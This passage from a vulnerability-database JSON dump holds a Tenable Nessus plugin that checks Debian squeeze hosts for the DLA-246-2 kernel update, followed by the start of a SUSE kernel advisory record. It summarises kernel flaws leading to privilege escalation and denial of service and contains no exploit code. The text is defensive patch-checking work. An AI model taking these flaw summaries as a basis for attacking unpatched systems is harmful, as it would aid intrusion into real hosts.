"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-doc-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-manual-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-source-2.6.32", "p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-base", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64", 
"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-tools-2.6.32", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-libc-dev", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686"], "id": "DEBIAN_DLA-246.NASL", "href": "https://www.tenable.com/plugins/nessus/84252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-246-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84252);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-5321\", \"CVE-2012-6689\", \"CVE-2014-3184\", \"CVE-2014-8159\", \"CVE-2014-9683\", \"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-1805\", \"CVE-2015-2041\", \"CVE-2015-2042\", \"CVE-2015-2830\", \"CVE-2015-2922\", \"CVE-2015-3339\", \"CVE-2015-4167\");\n script_bugtraq_id(69768, 72643, 72729, 72730, 72739, 73060, 73141, 73699, 74243, 74315, 74951, 74963, 74964, 75001);\n\n script_name(english:\"Debian DLA-246-2 : linux-2.6 regression update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n 
script_set_attribute(\n attribute:\"description\", \n value:\n\"The linux-2.6 update issued as DLA-246-1 caused regressions. This\nupdate corrects the defective patches applied in that update causing\nthese problems. For reference the original advisory text follows.\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\nJiri Slaby discovered that tty_driver_lookup_tty() may leak a\nreference to the tty driver. A local user could use this flaw to crash\nthe system.\n\nCVE-2012-6689\n\nPablo Neira Ayuso discovered that non-root user-space processes can\nsend forged Netlink notifications to other processes. A local user\ncould use this flaw for denial of service or privilege escalation.\n\nCVE-2014-3184\n\nBen Hawkes discovered that various HID drivers may over-read the\nreport descriptor buffer, possibly resulting in a crash if a HID with\na crafted descriptor is plugged in.\n\nCVE-2014-8159\n\nIt was found that the Linux kernel's InfiniBand/RDMA subsystem did not\nproperly sanitize input parameters while registering memory regions\nfrom user space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system\nor, potentially, escalate their privileges on the system.\n\nCVE-2014-9683\n\nDmitry Chernenkov discovered that eCryptfs writes past the end of the\nallocated buffer during encrypted filename decoding, resulting in\nlocal denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 /\nCVE-2015-4167\n\nCarl Henrik Lunde discovered that the UDF implementation is missing\nseveral necessary length checks. 
A local user that can mount devices\ncould use these various flaws to crash the system, to leak information\nfrom the kernel, or possibly for privilege escalation.\n\nCVE-2015-1805\n\nRed Hat discovered that the pipe iovec read and write implementations\nmay iterate over the iovec twice but will modify the iovec such that\nthe second iteration accesses the wrong memory. A local user could use\nthis flaw to crash the system or possibly for privilege escalation.\nThis may also result in data corruption and information leaks in pipes\nbetween non-malicious processes.\n\nCVE-2015-2041\n\nSasha Levin discovered that the LLC subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this possibly\nallows privilege escalation from a process with CAP_NET_ADMIN\ncapability; it also results in a trivial information leak.\n\nCVE-2015-2042\n\nSasha Levin discovered that the RDS subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this results in a\ntrivial information leak.\n\nCVE-2015-2830\n\nAndrew Lutomirski discovered that when a 64-bit task on an amd64\nkernel makes a fork(2) or clone(2) system call using int $0x80, the\n32-bit compatibility flag is set (correctly) but is not cleared on\nreturn. As a result, both seccomp and audit will misinterpret the\nfollowing system call by the task(s), possibly leading to a violation\nof security policy.\n\nCVE-2015-2922\n\nModio AB discovered that the IPv6 subsystem would process a router\nadvertisement that specifies no route but only a hop limit, which\nwould then be applied to the interface that received it. 
This can\nresult in loss of IPv6 connectivity beyond the local network.\n\nThis may be mitigated by disabling processing of IPv6 router\nadvertisements if they are not needed: sysctl\nnet.ipv6.conf.default.accept_ra=0 sysctl\nnet.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\nIt was found that the execve(2) system call can race with inode\nattribute changes made by chown(2). Although chown(2) clears the\nsetuid/setgid bits of a file if it changes the respective owner ID,\nthis race condition could result in execve(2) setting effective\nuid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167\nwhich will be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/06/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/linux-2.6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:firmware-linux-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-2.6.32\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-tools-2.6.32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"firmware-linux-free\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-base\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-doc-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-486\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-i386\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-openvz\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"linux-headers-2.6.32-5-common-vserver\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-xen\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-486\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686-dbg\", 
reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64-dbg\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-libc-dev\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-manual-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-patch-debian-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-source-2.6.32\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-support-2.6.32-5\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-tools-2.6.32\", 
reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze13\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze13\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:01", "description": "The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-5707: An integer overflow in the SCSI generic\n driver could be potentially used by local attackers to\n crash the kernel or execute code (bsc#940338).\n\n - CVE-2015-5364: A remote denial of service (hang) via UDP\n flood with incorrect package checksums was fixed.\n (bsc#936831).\n\n - CVE-2015-5366: A remote denial of service (unexpected\n error returns) via UDP flood with incorrect package\n checksums was fixed. (bsc#936831).\n\n - CVE-2015-1420: A race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel allowed\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function (bnc#915517).\n\n - CVE-2015-4700: A local user could have created a bad\n instruction in the JIT processed BPF code, leading to a\n kernel crash (bnc#935705).\n\n - CVE-2015-4167: The UDF filesystem in the Linux kernel\n was vulnerable to a crash which could occur while\n fetching inode information from a corrupted/malicious\n udf file system image. 
(bsc#933907).\n\n - CVE-2014-9728 CVE-2014-9729 CVE-2014-9730 CVE-2014-9731:\n Various issues in handling UDF filesystems in the Linux\n kernel allowed the corruption of kernel memory and other\n issues. An attacker able to mount a corrupted/malicious\n UDF file system image could cause the kernel to crash.\n (bsc#933904 bsc#933896)\n\n - CVE-2015-2150: The Linux kernel did not properly\n restrict access to PCI command registers, which might\n have allowed local guest users to cause a denial of\n service (non-maskable interrupt and host crash) by\n disabling the (1) memory or (2) I/O decoding for a PCI\n Express device and then accessing the device, which\n triggers an Unsupported Request (UR) response\n (bsc#919463).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c as used in\n the Linux kernel 2.6.x and 3.x in SUSE Linux\n distributions, allowed guest OS users to obtain\n sensitive information from uninitialized locations in\n host OS kernel memory via unspecified vectors\n (bnc#917830).\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel did not prevent the TS_COMPAT flag from reaching\n a user-mode task, which might have allowed local users\n to bypass the seccomp or audit protection mechanism via\n a crafted application that uses the (1) fork or (2)\n close system call, as demonstrated by an attack against\n seccomp before 3.16 (bnc#926240).\n\n - CVE-2015-1805: The Linux kernels implementation of\n vectored pipe read and write functionality did not take\n into account the I/O vectors that were already processed\n when retrying after a failed atomic access operation,\n potentially resulting in memory corruption due to an I/O\n vector array overrun. A local, unprivileged user could\n use this flaw to crash the system or, potentially,\n escalate their privileges on the system. (bsc#933429).\n\nAlso \n\nThe update package also includes non-security fixes. 
See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2015-09-24T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : kernel (SUSE-SU-2015:1611-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "modified": "2015-09-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-base", "p-cpe:/a:novell:suse_linux:kernel-bigsmp", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-extra", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel"], "id": "SUSE_SU-2015-1611-1.NASL", "href": 
"https://www.tenable.com/plugins/nessus/86121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1611-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86121);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-0777\", \"CVE-2015-1420\", \"CVE-2015-1805\", \"CVE-2015-2150\", \"CVE-2015-2830\", \"CVE-2015-4167\", \"CVE-2015-4700\", \"CVE-2015-5364\", \"CVE-2015-5366\", \"CVE-2015-5707\");\n script_bugtraq_id(72357, 73014, 73699, 73921, 74951, 74963, 74964, 75001, 75356, 75510);\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : kernel (SUSE-SU-2015:1611-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP3 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-5707: An integer overflow in the SCSI generic\n driver could be potentially used by local attackers to\n crash the kernel or execute code (bsc#940338).\n\n - CVE-2015-5364: A remote denial of service (hang) via UDP\n flood with incorrect package checksums was fixed.\n (bsc#936831).\n\n - CVE-2015-5366: A remote denial of service (unexpected\n error returns) via UDP flood with incorrect package\n checksums was fixed. 
